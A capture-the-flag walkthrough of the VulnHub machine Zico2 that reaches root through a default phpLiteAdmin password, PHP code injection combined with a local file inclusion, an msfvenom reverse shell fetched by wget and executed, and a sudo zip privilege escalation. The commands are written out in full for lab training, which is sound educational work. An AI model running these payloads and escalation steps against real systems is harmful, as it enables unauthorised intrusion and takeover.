Capture the flag (CTF)

Zico2: 1 – Walkthrough

November 21, 2017 by Chiragh Dewan

Zico2 is a machine that came on VulnHub. Created by Rafael, it surfaced on June 19th, 2017. It can be downloaded from https://www.vulnhub.com/entry/zico2-1,210/

The objective is to get root privileges and get the flag.

For a change, I would be using https://root-me.org to run the target machine. I tried to run the machine locally using VMware and Virtual Box, however, due to some networking issues, Zico was not being assigned an IP address. I contacted Rafael on Twitter, and he was more than happy and willing to solve my problem. In the end, he suggested I give https://root-me.org a try as they already have a working copy of Zico in their CTF-all-day.

Once signed up, the process of starting Zico is simple. You go on CTF-all-day, select the vulnerable machine you want to use, in this case, Zico2 (last in the last as its alphabetized), and you start the game.

My machine was reachable at http://ctf03.root-me.org/, and this is what it showed:

Let the attacking begin. Like my attacking machine, I will be using Kali 2017.1 running on a VMware Fusion.

Running a simple Zenmap scan showed the following ports open:

Seeing we know that there is Zico’s Shop running on port 80, let’s just focus on that for now. I ran dirb to see what more information I could gather from it:

$ dirb http://ctf03.root-me.org/

This showed a directory called dbadmin which had a PHP file called test_db.php:

Which opened phpLiteAdmin. Trying the first default password, admin, gave me the entry to go in:

I looked around and found that 2 users were created. I tried to decrypt the hash and log in using SSH, but it did not work:

After looking around for a while, I realized that this might be vulnerable to Remote PHP Code Injection (https://www.exploit-db.com/exploits/24044/), so I thought I would give that a try:

  • So, I created a database called hack.php
  • I created a table with the name test with 1 column
  • Under test, I created a field test as TEXT and with the default value: <?php phphinfo(); ?>

Now, to exploit this, I need to find an LFI vulnerability.

To do that, I went back to the web application and started going through the source code. Within minutes the following code block caught my eye:

This looked like something I could work with:

http://ctf03.root-me.org/view.php?page=../../usr/databases/hack.php

It worked! Now it is time to make a shell and get connected. To make the shell, I used MSFvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.92.141 lport=4444 -f elf > /root/Desktop/shell

Time to upload it to the target machine:

I update the entry in the table to the following:

<?php system(“cd /tmp; wget http://172.16.92.141/shell; chmod +x shell; ./shell”); ?>

moreover, start a multi/handler on Metasploit:

and we get a session!

Now when looked into the folders, a file called, wp-config.php present in /home/zico/wordpress/ seemed to give some useful information:

Using these credentials, I tried to log in via SSH, and they worked!

Now time to get root privileges:

On trying the command:

$ sudo -l

This is what is showed us:

After running the following two commands:

$ touch /tmp/exploit

$ sudo -u root zip /tmp/exploit.zip /tmp/exploit -T –unzip-command=”sh -c /bin/sh”

We are root!

Here’s the flag:

Posted: November 21, 2017
Author
Chiragh Dewan
View Profile

A creative problem-solving full-stack web developer with expertise in Information Security Audit, Web Application Audit, Vulnerability Assessment, Penetration Testing/ Ethical Hacking as well as previous experience in Artificial Intelligence, Machine Learning, and Natural Language Processing. He has also been recognised by various companies such as Facebook, Google, Microsoft, PayPal, Netflix, Blackberry, etc for reporting various security vulnerabilities. He has also given various talks on Artificial Intelligence and Cyber Security including at an TEDx event.

Leave a Reply

Your email address will not be published.